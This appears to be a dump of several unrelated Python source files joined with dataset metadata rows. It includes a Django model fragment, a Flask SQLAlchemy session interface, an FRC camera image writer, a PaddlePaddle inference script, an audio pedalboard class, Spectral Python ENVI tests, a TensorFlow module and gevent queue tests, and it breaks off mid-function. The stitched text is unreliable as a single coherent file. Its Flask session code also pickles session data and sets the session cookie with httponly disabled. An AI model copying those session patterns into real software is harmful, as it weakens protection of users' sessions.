item_377 = models.CharField(max_length=11, choices=item_377_choices, null=True)
item_378_choices = [('understands', 'understands'), ('produces', 'produces')]
item_378 = models.CharField(max_length=11, choices=item_378_choices, null=True)
item_379_choices = [('understands', 'understands'), ('produces', 'produces')]
item_379 = models.CharField(max_length=11, choices=item_379_choices, null=True)
item_380_choices = [('understands', 'understands'), ('produces', 'produces')]
item_380 = models.CharField(max_length=11, choices=item_380_choices, null=True)
item_381_choices = [('understands', 'understands'), ('produces', 'produces')]
item_381 = models.CharField(max_length=11, choices=item_381_choices, null=True)
item_382_choices = [('understands', 'understands'), ('produces', 'produces')]
item_382 = models.CharField(max_length=11, choices=item_382_choices, null=True)
item_383_choices = [('understands', 'understands'), ('produces', 'produces')]
item_383 = models.CharField(max_length=11, choices=item_383_choices, null=True)
item_384_choices = [('understands', 'understands'), ('produces', 'produces')]
item_384 = models.CharField(max_length=11, choices=item_384_choices, null=True)
item_385_choices = [('understands', 'understands'), ('produces', 'produces')]
item_385 = models.CharField(max_length=11, choices=item_385_choices, null=True)
| gpl-2.0 | 4,529,313,738,187,687,000 | 81.174194 | 83 | 0.685358 | false | 3.440759 | false | false | false |
bcarroll/authmgr | authmgr/authmgr/lib/Flask_SQLAlchemySession/__init__.py | 1 | 3240 | """
https://github.com/MSA-Argentina/FlaskSQLAlchemySession/edit/master/FlaskSQLAlchemySession/__init__.py
[description]
Variables:
db {[type]} -- [description]
_table_name {str} -- [description]
_data_serializer {[type]} -- [description]
"""
from __future__ import absolute_import
import pickle
from datetime import timedelta, datetime
from uuid import uuid4
from werkzeug.datastructures import CallbackDict
from flask.sessions import SessionInterface, SessionMixin
from flask_sqlalchemy import SQLAlchemy
db = SQLAlchemy()
_table_name = "sessions"
_data_serializer = pickle
def set_db_session_interface(app, table_name=None, data_serializer=None):
global _table_name, _data_serializer
if table_name is not None:
_table_name = table_name
if data_serializer is not None:
_data_serializer = data_serializer
db.init_app(app)
app.session_interface = SQLAlchemySessionInterface()
return app
class SQLAlchemySession(CallbackDict, SessionMixin):
def __init__(self, initial=None, sid=None, new=False):
def on_update(self):
self.modified = True
CallbackDict.__init__(self, initial, on_update)
self.sid = sid
self.new = new
self.modified = False
class SQLAlchemySessionInterface(SessionInterface):
def __init__(self):
# this could be your mysql database or sqlalchemy db object
pass
def generate_sid(self):
return str(uuid4())
def open_session(self, app, request):
# query your cookie for the session id
ret = None
sid = request.cookies.get(app.session_cookie_name)
if not sid:
sid = self.generate_sid()
ret = SQLAlchemySession(sid=sid, new=True)
else:
val = Session.query.get(sid)
if val is not None:
data = _data_serializer.loads(val.data)
ret = SQLAlchemySession(data, sid=sid)
else:
ret = SQLAlchemySession(sid=sid, new=True)
return ret
def save_session(self, app, session, response):
# save the sesion data if exists in db
# return a response cookie with details
domain = self.get_cookie_domain(app)
val = Session.query.get(session.sid)
now = datetime.utcnow()
if not session:
if val is not None:
db.session.delete(val)
if session.modified:
response.delete_cookie(app.session_cookie_name, domain=domain)
else:
data = _data_serializer.dumps(dict(session))
if val is None:
val = Session(session_id=session.sid, data=data, atime=now)
else:
val.atime = now
val.data = data
db.session.add(val)
db.session.commit()
response.set_cookie(app.session_cookie_name, session.sid,
expires=now + timedelta(days=1), httponly=False,
domain=domain)
class Session(db.Model):
__tablename__ = _table_name
session_id = db.Column(db.String(129), unique=True, primary_key=True)
atime = db.Column(db.DateTime())
data = db.Column(db.Text())
| bsd-3-clause | 2,075,606,725,752,848,000 | 28.724771 | 102 | 0.614198 | false | 4.0399 | false | false | false |
Ironpulse/CRC2017 | Cam/imagewriter.py | 1 | 4698 |
import os.path
import time
import threading
import cv2
import numpy as np
import logging
logger = logging.getLogger('cscore.storage')
class ImageWriter:
'''
Creates a thread that periodically writes images to a specified
directory. Useful for looking at images after a match has
completed.
The default location is ``/media/sda1/camera``. The folder
``/media/sda1`` is the default location that USB drives inserted into
the RoboRIO are mounted at. The USB drive must have a directory in it
named ``camera``.
.. note:: It is recommended to only write images when something useful
(such as targeting) is happening, otherwise you'll end up
with a lot of images written to disk that you probably aren't
interested in.
Intended usage is::
self.image_writer = ImageWriter()
..
while True:
img = ..
if self.logging_enabled:
self.image_writer.setImage(img)
'''
def __init__(self, *, location_root='/media/sda1/camera',
capture_period=0.5,
image_format='jpg'):
'''
:param location_root: Directory to write images to. A subdirectory
with the current time will be created, and
timestamped images will be written to the
subdirectory.
:param capture_period: How often to write images to disk
:param image_format: File extension of files to write
'''
self.location_root = os.path.abspath(location_root)
self.capture_period = capture_period
self.image_format = image_format
self.active = True
self._location = None
self.has_image = False
self.size = None
self.lock = threading.Condition()
self._thread = threading.Thread(target=self._run, daemon=True)
self._thread.start()
def setImage(self, img):
'''
Call this function when you wish to write the image to disk. Not
every image is written to disk. Makes a copy of the image.
:param img: A numpy array representing an OpenCV image
'''
if not self.active:
return
if self.size is None or self.size[0] != img.shape[0] or self.size[1] != img.shape[1]:
h, w = img.shape[:2]
self.size = (h, w)
self.out1 = np.empty((h, w, 3), dtype=np.uint8)
self.out2 = np.empty((h, w, 3), dtype=np.uint8)
with self.lock:
cv2.copyMakeBorder(img, 0, 0, 0, 0, cv2.BORDER_CONSTANT, value=(0,0,255), dst=self.out1)
self.has_image = True
self.lock.notify()
@property
def location(self):
if self._location is None:
# This assures that we only log when a USB memory stick is plugged in
if not os.path.exists(self.location_root):
raise IOError("Logging disabled, %s does not exist" % self.location_root)
# Can't do this when program starts, time might be wrong. Ideally by now the DS
# has connected, so the time will be correct
self._location = self.location_root + '/%s' % time.strftime('%Y-%m-%d %H.%M.%S')
logger.info("Logging to %s", self._location)
os.makedirs(self._location, exist_ok=True)
return self._location
def _run(self):
last = time.time()
logger.info("Storage thread started")
try:
while True:
with self.lock:
now = time.time()
while (not self.has_image) or (now - last) < self.capture_period:
self.lock.wait()
now = time.time()
self.out2, self.out1 = self.out1, self.out2
self.has_image = False
fname = '%s/%.2f.%s' % (self.location, now, self.image_format)
cv2.imwrite(fname, self.out2)
last = now
except IOError as e:
logger.error("Error logging images: %s", e)
logger.warn("Storage thread exited")
self.active = False
| agpl-3.0 | -402,439,446,709,973,600 | 33.807407 | 100 | 0.508514 | false | 4.619469 | false | false | false |
zhaopu7/models | nce_cost/infer.py | 1 | 1992 | # -*- encoding:utf-8 -*-
import numpy as np
import glob
import gzip
import paddle.v2 as paddle
from nce_conf import network_conf
def main():
paddle.init(use_gpu=False, trainer_count=1)
word_dict = paddle.dataset.imikolov.build_dict()
dict_size = len(word_dict)
prediction_layer = network_conf(
is_train=False,
hidden_size=128,
embedding_size=512,
dict_size=dict_size)
models_list = glob.glob('./models/*')
models_list = sorted(models_list)
with gzip.open(models_list[-1], 'r') as f:
parameters = paddle.parameters.Parameters.from_tar(f)
idx_word_dict = dict((v, k) for k, v in word_dict.items())
batch_size = 64
batch_ins = []
ins_iter = paddle.dataset.imikolov.test(word_dict, 5)
infer_data = []
infer_data_label = []
for item in paddle.dataset.imikolov.test(word_dict, 5)():
infer_data.append((item[:4]))
infer_data_label.append(item[4])
# Choose 100 samples from the test set to show how to infer.
if len(infer_data_label) == 100:
break
feeding = {
'firstw': 0,
'secondw': 1,
'thirdw': 2,
'fourthw': 3,
'fifthw': 4
}
predictions = paddle.infer(
output_layer=prediction_layer,
parameters=parameters,
input=infer_data,
feeding=feeding,
field=['value'])
for i, (prob, data,
label) in enumerate(zip(predictions, infer_data, infer_data_label)):
print '--------------------------'
print "No.%d Input: " % (i+1) + \
idx_word_dict[data[0]] + ' ' + \
idx_word_dict[data[1]] + ' ' + \
idx_word_dict[data[2]] + ' ' + \
idx_word_dict[data[3]]
print 'Ground Truth Output: ' + idx_word_dict[label]
print 'Predict Output: ' + idx_word_dict[prob.argsort(
kind='heapsort', axis=0)[-1]]
print
if __name__ == '__main__':
main()
| apache-2.0 | -6,765,368,289,635,308,000 | 27.457143 | 80 | 0.549197 | false | 3.387755 | false | false | false |
PedalPi/PluginsManager | pluginsmanager/model/pedalboard.py | 1 | 8060 | # Copyright 2017 SrMouraSilva
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pluginsmanager.model.effects_list import EffectsList
from pluginsmanager.model.connections_list import ConnectionsList
from pluginsmanager.observer.update_type import UpdateType
from unittest.mock import MagicMock
class Pedalboard(object):
"""
Pedalboard is a patch representation: your structure contains
:class:`.Effect` and :class:`~pluginsmanager.model.connection.Connection`::
>>> pedalboard = Pedalboard('Rocksmith')
>>> bank.append(pedalboard)
>>> builder = Lv2EffectBuilder()
>>> pedalboard.effects
[]
>>> reverb = builder.build('http://calf.sourceforge.net/plugins/Reverb')
>>> pedalboard.append(reverb)
>>> pedalboard.effects
[<Lv2Effect object as 'Calf Reverb' active at 0x7f60effb09e8>]
>>> fuzz = builder.build('http://guitarix.sourceforge.net/plugins/gx_fuzzfacefm_#_fuzzfacefm_')
>>> pedalboard.effects.append(fuzz)
>>> pedalboard.connections
[]
>>> pedalboard.connections.append(Connection(sys_effect.outputs[0], fuzz.inputs[0])) # View SystemEffect for more details
>>> pedalboard.connections.append(Connection(fuzz.outputs[0], reverb.inputs[0]))
>>> # It works too
>>> pedalboard.connect(reverb.outputs[1], sys_effect.inputs[0])
>>> pedalboard.connections
[<Connection object as 'system.capture_1 -> GxFuzzFaceFullerMod.In' at 0x7f60f45f3f60>, <Connection object as 'GxFuzzFaceFullerMod.Out -> Calf Reverb.In L' at 0x7f60f45f57f0>, <Connection object as 'Calf Reverb.Out R -> system.playback_1' at 0x7f60f45dacc0>]
>>> pedalboard.data
{}
>>> pedalboard.data = {'my-awesome-component': True}
>>> pedalboard.data
{'my-awesome-component': True}
For load the pedalboard for play the songs with it::
>>> mod_host.pedalboard = pedalboard
All changes¹ in the pedalboard will be reproduced in mod-host.
¹ Except in data attribute, changes in this does not interfere with anything.
:param string name: Pedalboard name
"""
def __init__(self, name):
self.name = name
self._effects = EffectsList()
self._connections = ConnectionsList(self)
self.effects.observer = self._effects_observer
self.connections.observer = self._connections_observer
self._observer = MagicMock()
self.bank = None
self.data = {}
@property
def observer(self):
return self._observer
@observer.setter
def observer(self, observer):
self._observer = observer
for effect in self.effects:
effect.observer = observer
def _effects_observer(self, update_type, effect, index, **kwargs):
kwargs['index'] = index
kwargs['origin'] = self
if update_type == UpdateType.CREATED:
self._init_effect(effect)
elif update_type == UpdateType.UPDATED:
self._init_effect(effect)
old_effect = kwargs['old']
if old_effect not in self.effects:
self._clear_effect(old_effect)
elif update_type == UpdateType.DELETED:
self._clear_effect(effect)
self.observer.on_effect_updated(effect, update_type, index=index, origin=self)
def _init_effect(self, effect):
effect.pedalboard = self
effect.observer = self.observer
def _clear_effect(self, effect):
for connection in effect.connections:
self.connections.remove_silently(connection)
effect.pedalboard = None
effect.observer = MagicMock()
def _connections_observer(self, update_type, connection, index, **kwargs):
self.observer.on_connection_updated(connection, update_type, pedalboard=self, **kwargs)
@property
def json(self):
"""
Get a json decodable representation of this pedalboard
:return dict: json representation
"""
return self.__dict__
@property
def __dict__(self):
return {
'name': self.name,
'effects': [effect.json for effect in self.effects],
'connections': [connection.json for connection in self.connections],
'data': self.data
}
def append(self, effect):
"""
Add a :class:`.Effect` in this pedalboard
This works same as::
>>> pedalboard.effects.append(effect)
or::
>>> pedalboard.effects.insert(len(pedalboard.effects), effect)
:param Effect effect: Effect that will be added
"""
self.effects.append(effect)
@property
def effects(self):
"""
Return the effects presents in the pedalboard
.. note::
Because the effects is an :class:`.ObservableList`, it isn't settable.
For replace, del the effects unnecessary and add the necessary
effects
"""
return self._effects
@property
def connections(self):
"""
Return the pedalboard connections list
.. note::
Because the connections is an :class:`.ObservableList`, it isn't settable.
For replace, del the connections unnecessary and add the necessary
connections
"""
return self._connections
@property
def index(self):
"""
Returns the first occurrence of the pedalboard in your bank
"""
if self.bank is None:
raise IndexError('Pedalboard not contains a bank')
return self.bank.pedalboards.index(self)
def connect(self, output_port, input_port):
"""
Connect two :class:`.Effect` instances in this pedalboard.
For this, is necessary informs the output port origin and the input port destination::
>>> pedalboard.append(driver)
>>> pedalboard.append(reverb)
>>> driver_output = driver.outputs[0]
>>> reverb_input = reverb.inputs[0]
>>> Connection(driver_output, reverb_input) in driver.connections
False
>>> pedalboard.connect(driver_output, reverb_input)
>>> Connection(driver_output, reverb_input) in driver.connections
True
:param Port output_port: Effect output port
:param Port input_port: Effect input port
"""
ConnectionClass = output_port.connection_class
self.connections.append(ConnectionClass(output_port, input_port))
def disconnect(self, output_port, input_port):
"""
Remove a connection between (two ports of) :class:`.Effect` instances.
For this, is necessary informs the output port origin and the input port destination::
>>> pedalboard.append(driver)
>>> pedalboard.append(reverb)
>>> driver_output = driver.outputs[0]
>>> reverb_input = reverb.inputs[0]
>>> pedalboard.connect(driver_output, reverb_input)
>>> Connection(driver_output, reverb_input) in driver.connections
True
>>> pedalboard.disconnect(driver_output, reverb_input)
>>> Connection(driver_output, reverb_input) in driver.connections
False
:param Port output_port: Effect output port
:param Port input_port: Effect input port
"""
ConnectionClass = output_port.connection_class
self.connections.remove(ConnectionClass(output_port, input_port))
| apache-2.0 | -5,304,959,297,585,082,000 | 33.435897 | 266 | 0.632043 | false | 4.092433 | false | false | false |
RubnC/modified-spectral | spectral/tests/envi.py | 1 | 11101 | #########################################################################
#
# envi.py - This file is part of the Spectral Python (SPy) package.
#
# Copyright (C) 2013 Thomas Boggs
#
# Spectral Python is free software; you can redistribute it and/
# or modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# Spectral Python is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software; if not, write to
#
# Free Software Foundation, Inc.
# 59 Temple Place, Suite 330
# Boston, MA 02111-1307
# USA
#
#########################################################################
#
# Send comments to:
# Thomas Boggs, [email protected]
#
# spyfile.py
'''Runs unit tests of functions associated with the ENVI file format.
To run the unit tests, type the following from the system command line:
# python -m spectral.tests.envi
'''
from __future__ import division, print_function, unicode_literals
import numpy as np
import os
from numpy.testing import assert_almost_equal
from .spytest import SpyTest
from spectral.tests import testdir
class ENVIWriteTest(SpyTest):
'''Tests that SpyFile memmap interfaces read and write properly.'''
def __init__(self):
pass
def setup(self):
import os
if not os.path.isdir(testdir):
os.makedirs(testdir)
def test_save_image_ndarray(self):
'''Test saving an ENVI formated image from a numpy.ndarray.'''
import os
import spectral
(R, B, C) = (10, 20, 30)
(r, b, c) = (3, 8, 23)
datum = 33
data = np.zeros((R, B, C), dtype=np.uint16)
data[r, b, c] = datum
fname = os.path.join(testdir, 'test_save_image_ndarray.hdr')
spectral.envi.save_image(fname, data, interleave='bil')
img = spectral.open_image(fname)
assert_almost_equal(img[r, b, c], datum)
def test_save_image_ndarray_no_ext(self):
'''Test saving an ENVI formated image with no image file extension.'''
import os
import spectral
data = np.arange(1000, dtype=np.int16).reshape(10, 10, 10)
base = os.path.join(testdir, 'test_save_image_ndarray_noext')
hdr_file = base + '.hdr'
spectral.envi.save_image(hdr_file, data, ext='')
rdata = spectral.open_image(hdr_file).load()
assert(np.all(data==rdata))
def test_save_image_ndarray_alt_ext(self):
'''Test saving an ENVI formated image with alternate extension.'''
import os
import spectral
data = np.arange(1000, dtype=np.int16).reshape(10, 10, 10)
base = os.path.join(testdir, 'test_save_image_ndarray_alt_ext')
hdr_file = base + '.hdr'
ext = '.foo'
img_file = base + ext
spectral.envi.save_image(hdr_file, data, ext=ext)
rdata = spectral.envi.open(hdr_file, img_file).load()
assert(np.all(data==rdata))
def test_save_image_spyfile(self):
'''Test saving an ENVI formatted image from a SpyFile object.'''
import os
import spectral
(r, b, c) = (3, 8, 23)
fname = os.path.join(testdir, 'test_save_image_spyfile.hdr')
src = spectral.open_image('92AV3C.lan')
spectral.envi.save_image(fname, src)
img = spectral.open_image(fname)
assert_almost_equal(src[r, b, c], img[r, b, c])
def test_create_image_metadata(self):
'''Test calling `envi.create_image` using a metadata dict.'''
import os
import spectral
(R, B, C) = (10, 20, 30)
(r, b, c) = (3, 8, 23)
offset = 1024
datum = 33
md = {'lines': R,
'samples': B,
'bands': C,
'interleave': 'bsq',
'header offset': offset,
'data type': 12,
'USER DEFINED': 'test case insensitivity'}
fname = os.path.join(testdir, 'test_create_image_metadata.hdr')
img = spectral.envi.create_image(fname, md)
mm = img.open_memmap(writable=True)
mm.fill(0)
mm[r, b, c] = datum
mm.flush()
img = spectral.open_image(fname)
img._disable_memmap()
assert_almost_equal(img[r, b, c], datum)
assert(img.offset == offset)
for key in md:
assert key.lower() in img.metadata
assert str(md[key]) == img.metadata[key.lower()]
def test_create_image_keywords(self):
'''Test calling `envi.create_image` using keyword args.'''
import os
import spectral
(R, B, C) = (10, 20, 30)
(r, b, c) = (3, 8, 23)
offset = 1024
datum = 33
fname = os.path.join(testdir, 'test_create_image_keywords.hdr')
img = spectral.envi.create_image(fname, shape=(R,B,C),
interleave='bsq',
dtype=np.uint16,
offset=offset)
mm = img.open_memmap(writable=True)
mm.fill(0)
mm[r, b, c] = datum
mm.flush()
img = spectral.open_image(fname)
img._disable_memmap()
assert_almost_equal(img[r, b, c], datum)
assert(img.offset == offset)
def test_save_invalid_dtype_fails(self):
'''Should not be able to write unsupported data type to file.'''
import spectral as spy
from spectral.io.envi import EnviDataTypeError
a = np.random.randint(0, 200, 900).reshape((30, 30)).astype(np.int8)
fname = os.path.join(testdir, 'test_save_invalid_dtype_fails.hdr')
try:
spy.envi.save_image('invalid.hdr', a)
except EnviDataTypeError as e:
pass
else:
raise Exception('Expected EnviDataTypeError to be raised.')
def test_save_load_classes(self):
'''Verify that `envi.save_classification` saves data correctly.'''
import spectral as spy
fname = os.path.join(testdir, 'test_save_load_classes.hdr')
gt = spy.open_image('92AV3GT.GIS').read_band(0)
spy.envi.save_classification(fname, gt, dtype=np.uint8)
gt2 = spy.open_image(fname).read_band(0)
assert(np.all(gt == gt2))
def test_open_nonzero_frame_offset_fails(self):
'''Opening files with nonzero frame offsets should fail.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_open_nonzero_frame_offset_fails.hdr')
spy.envi.save_image(fname, img)
fout = open(fname, 'a')
fout.write('major frame offsets = 128\n')
fout.close()
try:
img2 = spy.envi.open(fname)
except spy.envi.EnviFeatureNotSupported:
pass
else:
raise Exception('File erroneously opened.')
def test_open_zero_frame_offset_passes(self):
'''Files with frame offsets set to zero should open.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_open_zero_frame_offset_passes.hdr')
spy.envi.save_image(fname, img)
fout = open(fname, 'a')
fout.write('major frame offsets = 0\n')
fout.write('minor frame offsets = {0, 0}\n')
fout.close()
img2 = spy.envi.open(fname)
def test_save_nonzero_frame_offset_fails(self):
'''Opening files with nonzero frame offsets should fail.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_save_nonzero_frame_offset_fails.hdr')
meta = {'major frame offsets' : [128, 0]}
try:
spy.envi.save_image(fname, img, metadata=meta)
except spy.envi.EnviFeatureNotSupported:
pass
else:
raise Exception('File erroneously saved.')
def test_save_zero_frame_offset_passes(self):
'''Opening files with nonzero frame offsets should fail.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_save_zero_frame_offset_passes.hdr')
meta = {'major frame offsets' : 0}
spy.envi.save_image(fname, img, metadata=meta)
def test_catch_parse_error(self):
'''Failure to parse parameters should raise EnviHeaderParsingError.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_catch_parse_error.hdr')
spy.envi.save_image(fname, img)
fout = open(fname, 'a')
fout.write('foo = {{\n')
fout.close()
try:
img2 = spy.envi.open(fname)
except spy.envi.EnviHeaderParsingError:
pass
else:
raise Exception('Failed to raise EnviHeaderParsingError')
def test_header_missing_mandatory_parameter_fails(self):
'''Missing mandatory parameter should raise EnviMissingHeaderParameter.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_missing_param_fails.hdr')
spy.envi.save_image(fname, img)
lines = [line for line in open(fname).readlines() \
if 'bands' not in line]
fout = open(fname, 'w')
for line in lines:
fout.write(line)
fout.close()
try:
img2 = spy.envi.open(fname)
except spy.envi.MissingEnviHeaderParameter:
pass
else:
raise Exception('Failed to raise EnviMissingHeaderParameter')
def test_missing_ENVI_in_header_fails(self):
'''FileNotAnEnviHeader should be raised if "ENVI" not on first line.'''
import os
import spectral as spy
img = spy.open_image('92AV3C.lan')
fname = os.path.join(testdir, 'test_header_missing_ENVI_fails.hdr')
spy.envi.save_image(fname, img)
lines = open(fname).readlines()
fout = open(fname, 'w')
for line in lines[1:]:
fout.write(line)
fout.close()
try:
img2 = spy.envi.open(fname)
except spy.envi.FileNotAnEnviHeader:
pass
else:
raise Exception('Failed to raise EnviMissingHeaderParameter')
def run():
print('\n' + '-' * 72)
print('Running ENVI tests.')
print('-' * 72)
write_test = ENVIWriteTest()
write_test.run()
if __name__ == '__main__':
from spectral.tests.run import parse_args, reset_stats, print_summary
parse_args()
reset_stats()
run()
print_summary()
| gpl-2.0 | -3,295,892,582,417,661,400 | 36.12709 | 82 | 0.58265 | false | 3.656456 | true | false | false |
yufengg/tensorflow | tensorflow/contrib/bayesflow/python/ops/csiszar_divergence.py | 12 | 1562 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Csiszar f-Divergence and helpers.
See ${python/contrib.bayesflow.csiszar_divergence}.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.contrib.bayesflow.python.ops.csiszar_divergence_impl import *
# pylint: enable=wildcard-import
from tensorflow.python.util.all_util import remove_undocumented
_allowed_symbols = [
'amari_alpha',
'arithmetic_geometric',
'chi_square',
'dual_csiszar_function',
'jeffreys',
'jensen_shannon',
'kl_forward',
'kl_reverse',
'log1p_abs',
'modified_gan',
'monte_carlo_csiszar_f_divergence',
'pearson',
'squared_hellinger',
'symmetrized_csiszar_function',
'total_variation',
'triangular',
]
remove_undocumented(__name__, _allowed_symbols)
| apache-2.0 | 7,561,534,556,336,436,000 | 30.877551 | 80 | 0.689501 | false | 3.666667 | false | false | false |
mgadi/naemonbox | sources/psdash/gevent-1.0.1/greentest/test__queue.py | 3 | 10905 | from __future__ import with_statement
from greentest import TestCase, main, GenericGetTestCase
import gevent
from gevent.hub import get_hub
from gevent import util
from gevent import queue
from gevent.queue import Empty, Full
from gevent.event import AsyncResult
class TestQueue(TestCase):
def test_send_first(self):
self.switch_expected = False
q = queue.Queue()
q.put('hi')
self.assertEquals(q.get(), 'hi')
def test_send_last(self):
q = queue.Queue()
def waiter(q):
with gevent.Timeout(0.1):
self.assertEquals(q.get(), 'hi2')
return "OK"
p = gevent.spawn(waiter, q)
gevent.sleep(0.01)
q.put('hi2')
gevent.sleep(0.01)
assert p.get(timeout=0) == "OK"
def test_max_size(self):
q = queue.Queue(2)
results = []
def putter(q):
q.put('a')
results.append('a')
q.put('b')
results.append('b')
q.put('c')
results.append('c')
return "OK"
p = gevent.spawn(putter, q)
gevent.sleep(0)
self.assertEquals(results, ['a', 'b'])
self.assertEquals(q.get(), 'a')
gevent.sleep(0)
self.assertEquals(results, ['a', 'b', 'c'])
self.assertEquals(q.get(), 'b')
self.assertEquals(q.get(), 'c')
assert p.get(timeout=0) == "OK"
def test_zero_max_size(self):
q = queue.Channel()
def sender(evt, q):
q.put('hi')
evt.set('done')
def receiver(evt, q):
x = q.get()
evt.set(x)
e1 = AsyncResult()
e2 = AsyncResult()
p1 = gevent.spawn(sender, e1, q)
gevent.sleep(0.001)
self.assert_(not e1.ready())
p2 = gevent.spawn(receiver, e2, q)
self.assertEquals(e2.get(), 'hi')
self.assertEquals(e1.get(), 'done')
with gevent.Timeout(0):
gevent.joinall([p1, p2])
def test_multiple_waiters(self):
# tests that multiple waiters get their results back
q = queue.Queue()
def waiter(q, evt):
evt.set(q.get())
sendings = ['1', '2', '3', '4']
evts = [AsyncResult() for x in sendings]
for i, x in enumerate(sendings):
gevent.spawn(waiter, q, evts[i]) # XXX use waitall for them
gevent.sleep(0.01) # get 'em all waiting
results = set()
def collect_pending_results():
for e in evts:
with gevent.Timeout(0.001, False):
x = e.get()
results.add(x)
return len(results)
q.put(sendings[0])
self.assertEquals(collect_pending_results(), 1)
q.put(sendings[1])
self.assertEquals(collect_pending_results(), 2)
q.put(sendings[2])
q.put(sendings[3])
self.assertEquals(collect_pending_results(), 4)
def test_waiters_that_cancel(self):
q = queue.Queue()
def do_receive(q, evt):
with gevent.Timeout(0, RuntimeError()):
try:
result = q.get()
evt.set(result)
except RuntimeError:
evt.set('timed out')
evt = AsyncResult()
gevent.spawn(do_receive, q, evt)
self.assertEquals(evt.get(), 'timed out')
q.put('hi')
self.assertEquals(q.get(), 'hi')
def test_senders_that_die(self):
q = queue.Queue()
def do_send(q):
q.put('sent')
gevent.spawn(do_send, q)
self.assertEquals(q.get(), 'sent')
def test_two_waiters_one_dies(self):
def waiter(q, evt):
evt.set(q.get())
def do_receive(q, evt):
with gevent.Timeout(0, RuntimeError()):
try:
result = q.get()
evt.set(result)
except RuntimeError:
evt.set('timed out')
q = queue.Queue()
dying_evt = AsyncResult()
waiting_evt = AsyncResult()
gevent.spawn(do_receive, q, dying_evt)
gevent.spawn(waiter, q, waiting_evt)
gevent.sleep(0.1)
q.put('hi')
self.assertEquals(dying_evt.get(), 'timed out')
self.assertEquals(waiting_evt.get(), 'hi')
def test_two_bogus_waiters(self):
def do_receive(q, evt):
with gevent.Timeout(0, RuntimeError()):
try:
result = q.get()
evt.set(result)
except RuntimeError:
evt.set('timed out')
q = queue.Queue()
e1 = AsyncResult()
e2 = AsyncResult()
gevent.spawn(do_receive, q, e1)
gevent.spawn(do_receive, q, e2)
gevent.sleep(0.1)
q.put('sent')
self.assertEquals(e1.get(), 'timed out')
self.assertEquals(e2.get(), 'timed out')
self.assertEquals(q.get(), 'sent')
class TestChannel(TestCase):
def test_send(self):
channel = queue.Channel()
events = []
def another_greenlet():
events.append(channel.get())
events.append(channel.get())
g = gevent.spawn(another_greenlet)
events.append('sending')
channel.put('hello')
events.append('sent hello')
channel.put('world')
events.append('sent world')
self.assertEqual(['sending', 'hello', 'sent hello', 'world', 'sent world'], events)
g.get()
def test_wait(self):
channel = queue.Channel()
events = []
def another_greenlet():
events.append('sending hello')
channel.put('hello')
events.append('sending world')
channel.put('world')
events.append('sent world')
g = gevent.spawn(another_greenlet)
events.append('waiting')
events.append(channel.get())
events.append(channel.get())
self.assertEqual(['waiting', 'sending hello', 'hello', 'sending world', 'world'], events)
gevent.sleep(0)
self.assertEqual(['waiting', 'sending hello', 'hello', 'sending world', 'world', 'sent world'], events)
g.get()
def test_task_done(self):
channel = queue.JoinableQueue(0)
X = object()
gevent.spawn(channel.put, X)
result = channel.get()
assert result is X, (result, X)
assert channel.unfinished_tasks == 1, channel.unfinished_tasks
channel.task_done()
assert channel.unfinished_tasks == 0, channel.unfinished_tasks
class TestNoWait(TestCase):
def test_put_nowait_simple(self):
result = []
q = queue.Queue(1)
def store_result(func, *args):
result.append(func(*args))
run_callback = get_hub().loop.run_callback
run_callback(store_result, util.wrap_errors(Full, q.put_nowait), 2)
run_callback(store_result, util.wrap_errors(Full, q.put_nowait), 3)
gevent.sleep(0)
assert len(result) == 2, result
assert result[0] is None, result
assert isinstance(result[1], queue.Full), result
def test_get_nowait_simple(self):
result = []
q = queue.Queue(1)
q.put(4)
def store_result(func, *args):
result.append(func(*args))
run_callback = get_hub().loop.run_callback
run_callback(store_result, util.wrap_errors(Empty, q.get_nowait))
run_callback(store_result, util.wrap_errors(Empty, q.get_nowait))
gevent.sleep(0)
assert len(result) == 2, result
assert result[0] == 4, result
assert isinstance(result[1], queue.Empty), result
# get_nowait must work from the mainloop
def test_get_nowait_unlock(self):
result = []
q = queue.Queue(1)
p = gevent.spawn(q.put, 5)
def store_result(func, *args):
result.append(func(*args))
assert q.empty(), q
gevent.sleep(0)
assert q.full(), q
get_hub().loop.run_callback(store_result, q.get_nowait)
gevent.sleep(0)
assert q.empty(), q
assert result == [5], result
assert p.ready(), p
assert p.dead, p
assert q.empty(), q
def test_get_nowait_unlock_channel(self):
result = []
q = queue.Channel()
p = gevent.spawn(q.put, 5)
def store_result(func, *args):
result.append(func(*args))
assert q.empty(), q
assert q.full(), q
gevent.sleep(0.001)
assert q.empty(), q
assert q.full(), q
get_hub().loop.run_callback(store_result, q.get_nowait)
gevent.sleep(0.001)
assert q.empty(), q
assert q.full(), q
assert result == [5], result
assert p.ready(), p
assert p.dead, p
assert q.empty(), q
# put_nowait must work from the mainloop
def test_put_nowait_unlock(self):
result = []
q = queue.Queue()
p = gevent.spawn(q.get)
def store_result(func, *args):
